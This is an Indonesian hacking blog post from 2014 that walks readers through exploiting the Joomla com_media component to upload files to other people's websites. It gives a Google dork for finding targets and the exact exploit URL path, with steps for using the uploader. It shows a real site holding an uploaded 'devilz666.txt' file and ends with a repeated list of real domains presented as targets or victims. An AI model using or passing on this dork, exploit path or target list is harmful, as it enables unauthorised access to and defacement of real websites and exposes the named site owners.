Selasa, 21 Januari 2014
Halo sobat semua.. Selamat sore, maaf yah udah jarang ngepost. Banyak urusan hehehe.. Ohiya pada kesempatan kali ini saya mau share tentang Hacking.
Berhubung Teknik ini udah banyak yang share, jadi ane nggak mau ketinggal juga, hehehe. Nah kita masuk pada topiknya aja, kali ini yang kita bahas mengenai Teknik Exploit Joomla yang memiliki Vulnerabilitas pada Component Media di CMS Joomla. Penasaran gimana caranya? gampang kok :)
Dork: inurl:com_media site:com
Exploit: /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
- Pertama agan cari targetnya terlebih dahulu di Google dengan memanfaatkan Dork diatas, klo bisa Dorknya tersebut di kembangin lagi yah, biar nemu target yang lebih fresh :D
- Kalau sudah ketemu targetnya, sekarang tambahin Exploit. Seteleh menambahkan Exploit maka yang terlihat seperti gambar berikut:
- Selanjutnya agan tinggal upload file yang agan inginkan di bagian Uploader
- Kalau berhasil akan muncul seperti gambar dibawah ini:
- Nah, untuk melihat hasil file yang sudah kita Upload tambahkan: /images/fileContoh, http://www.skylinepark.org/images/devilz666.txt
Note: File yang bisa di Upload cuman berextensi .txt .jpg .gif .png untuk php dan html tidak bisa.
www.ayrshirebridge.co.uk
www.magicrete.in
www.unitedwaypeel.org
www.cvbhejo.com
rockbandschoolofmusic.com
www.adriennejfurness.com
www.one-worldvolunteer.net
hiddenneedle.com
www.wartakutim.com
permaculture.com.au/campus
arsomsilp.ac.th/health
www.skylinepark.org
www.gorillareisen.de
www.moclinejo.de
www.sv-mistelgau.de
www.ablogic.de
www.magicrete.in
www.unitedwaypeel.org
www.cvbhejo.com
rockbandschoolofmusic.com
www.adriennejfurness.com
www.one-worldvolunteer.net
hiddenneedle.com
www.wartakutim.com
permaculture.com.au/campus
arsomsilp.ac.th/health
www.skylinepark.org
www.gorillareisen.de
www.moclinejo.de
www.sv-mistelgau.de
www.ablogic.de
